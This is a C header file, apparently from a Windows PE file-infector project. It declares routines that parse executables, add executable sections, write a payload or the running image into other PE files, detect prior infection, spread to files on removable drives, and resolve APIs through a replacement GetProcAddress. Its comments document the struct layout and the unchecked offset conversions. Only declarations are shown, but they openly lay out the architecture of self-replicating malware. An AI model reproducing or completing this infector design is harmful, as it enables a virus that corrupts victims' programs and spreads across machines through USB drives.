path: root/include/pe_infect.h
blob: fecbfcc6875e7bf3a18a86e6c398e9b7f9c70484 (plain)
#ifndef PE_INFECT_H
#define PE_INFECT_H

#include "loader.h"


/* Two-level stringification: MAKE_STR(X) expands X first, then quotes it,
 * so a macro argument yields its expansion rather than its name. */
#define STRINGIFY(s) #s
#define MAKE_STR(s) STRINGIFY(s)

/*
 * View over a PE image held in memory, populated by bParsePE().
 *
 * ptrToBuf/bufSiz describe the caller-supplied buffer. The hdr* and dataDir
 * members are typed pointers that presumably point into that buffer; the
 * header does not show where they are set, so confirm in pe_infect.c before
 * relying on any of them when `valid` is not set. The DLL and loader
 * sub-ranges are optional: check hasDLL / hasLdr before touching the
 * matching pointer and size.
 *
 * Layout note: the struct is packed (no padding) with the GCC struct layout,
 * so member order is part of the binary layout. Do not reorder or insert
 * members without checking every consumer of this layout. Pointer members
 * of a packed struct may be unaligned; that is tolerated on x86 but is not
 * portable.
 */
typedef struct ParsedPE
{
    BOOL valid;                          /* presumably TRUE only after a successful parse -- confirm in bParsePE */
    BYTE* ptrToBuf;                      /* start of the raw image buffer */
    SIZE_T bufSiz;                       /* size of that buffer in bytes */
    PIMAGE_DOS_HEADER hdrDos;            /* "MZ" header */
    PIMAGE_FILE_HEADER hdrFile;          /* COFF file header */
    PIMAGE_OPTIONAL_HEADER hdrOptional;  /* optional header; 32-bit form presumed (DWORD image base below) */
    PIMAGE_SECTION_HEADER hdrSection;    /* section header table (first entry, presumably) */
    PIMAGE_DATA_DIRECTORY dataDir;       /* data directory entries */
    /* DLL payload range: meaningful only when hasDLL is set */
    BOOL hasDLL;
    BYTE* ptrToDLL;
    SIZE_T sizOfDLL;
    /* Loader range: meaningful only when hasLdr is set */
    BOOL hasLdr;
    BYTE* ptrToLdr;
    SIZE_T sizOfLdr;
    struct loader_x86_data* loader86;    /* type comes from loader.h, presumably */
} __attribute__((packed, gcc_struct)) ParsedPE;


/*
 * Module-level state accessors. The header only shows setter/getter pairs;
 * where the values live, and whether they are shared across threads, is
 * decided in pe_infect.c. Nothing here establishes thread-safety, so treat
 * these as single-threaded unless the implementation says otherwise.
 */
void setOrigLoader(const struct loader_x86_data* ldr);

const struct loader_x86_data* getOrigLoader(void);

void setImageBase(DWORD newBase);

DWORD getImageBase(void);

void setImageSize(DWORD newSize);

DWORD getImageSize(void);

void setSectionAdr(DWORD newAdr);

DWORD getSectionAdr(void);

/* Returns the loader blob and writes its size to *pSiz (caller must pass a
 * non-NULL pSiz unless the implementation tolerates NULL -- confirm). */
BYTE* getLoader(SIZE_T* pSiz);

/* Size of the loader as actually used; how it differs from getLoader's
 * reported size is not visible from this header. */
SIZE_T getRealLoaderSize(void);

/*
 * RVA <-> file offset <-> pointer conversions over a parsed image.
 *
 * NOTE(review): these signatures have no error value distinct from a
 * legitimate 0, and nothing in this header shows the result being checked
 * against ppPtr->bufSiz. When ppPtr was built from an untrusted file, treat
 * a returned offset or pointer as unvalidated until the implementation is
 * confirmed to range-check it -- an RVA in a crafted section table can
 * otherwise resolve outside the buffer.
 */
BYTE* PtrFromOffset(BYTE* base, DWORD offset);

DWORD RvaToOffset(const struct ParsedPE* ppPtr, DWORD dwRva);

BYTE* RvaToPtr(const struct ParsedPE* ppPtr, DWORD dwRva);

DWORD OffsetToRva(const struct ParsedPE* ppPtr, DWORD offset);

DWORD PtrToOffset(const struct ParsedPE* ppPtr, const BYTE* ptr);

DWORD PtrToRva(const struct ParsedPE* ppPtr, const BYTE* ptr);

/*
 * Parses the image in buf (szBuf bytes) into *ppPtr. Returns FALSE on
 * failure. The meaning of earlyStage (presumably a reduced set of checks
 * for an early call site) is only visible in pe_infect.c. szBuf is the
 * only size the parser receives, so every header pointer it produces
 * must be validated against it; confirm that in the implementation.
 */
BOOL bParsePE(BYTE* buf, const SIZE_T szBuf, struct ParsedPE* ppPtr, BOOL earlyStage);

/* Checks for the project's end-of-image marker in a parsed image. */
BOOL bCheckEndMarker(const struct ParsedPE *ppPtr);

/*
 * Appends a section named sName containing the first szSection bytes of
 * sectionContentBuf to the image in *ppPtr; executable selects whether
 * the new section is marked executable (presumably via the section
 * characteristics). Returns FALSE on failure. Whether ppPtr's buffer is
 * reallocated or must already have room is not visible here -- confirm
 * before reusing pointers taken from ppPtr across this call.
 */
BOOL bAddSection(const char* sName, const BYTE* sectionContentBuf, SIZE_T szSection, BOOL executable, struct ParsedPE* ppPtr);

/* Writes maliciousBuf (maliciousSiz bytes) into the PE file at path sFile.
 * Returns FALSE on failure. */
BOOL bInfectFileWith(const char* sFile, const BYTE* maliciousBuf, SIZE_T maliciousSiz);

/* Same as bInfectFileWith but with the running image as the payload. */
BOOL bInfectWithMyself(const char* sFile);

/* TRUE when the parsed image already carries this project's payload. */
BOOL bIsInfected(const struct ParsedPE* ppPtr);

/*
 * Finds the section named sName (case-sensitive when caseSensitive is set)
 * and writes its size to *pSegSiz; returns its address, or presumably NULL
 * when absent -- confirm the not-found return value in pe_infect.c.
 */
void* pGetSegmentAdr(const char* sName, BOOL caseSensitive, const struct ParsedPE* ppPtr, SIZE_T* pSegSiz);

/* Applies relocations to the DLL section at dllSectionAdr/dllSectionSiz
 * relative to dllBaseAdr. The DWORD result's meaning (count or status) is
 * not visible here. */
DWORD dwDoRebase(void* dllSectionAdr, SIZE_T dllSectionSiz, const void* dllBaseAdr);

/* Walks removable drives and infects PE files found there; the DWORD
 * result's meaning is defined in pe_infect.c. */
DWORD dwInfectRemovables(void);

/* Counts imported libraries that are not system DLLs; how "system" is
 * decided is not visible here. */
DWORD dwCountNonSystemImportLibs(const struct ParsedPE* ppPtr);

/* Drop-in replacement for the Win32 GetProcAddress (same signature and
 * calling convention); resolution strategy lives in pe_infect.c. */
FARPROC WINAPI fnMyGetProcAddress(HMODULE hModule, LPCSTR szProcName);

#endif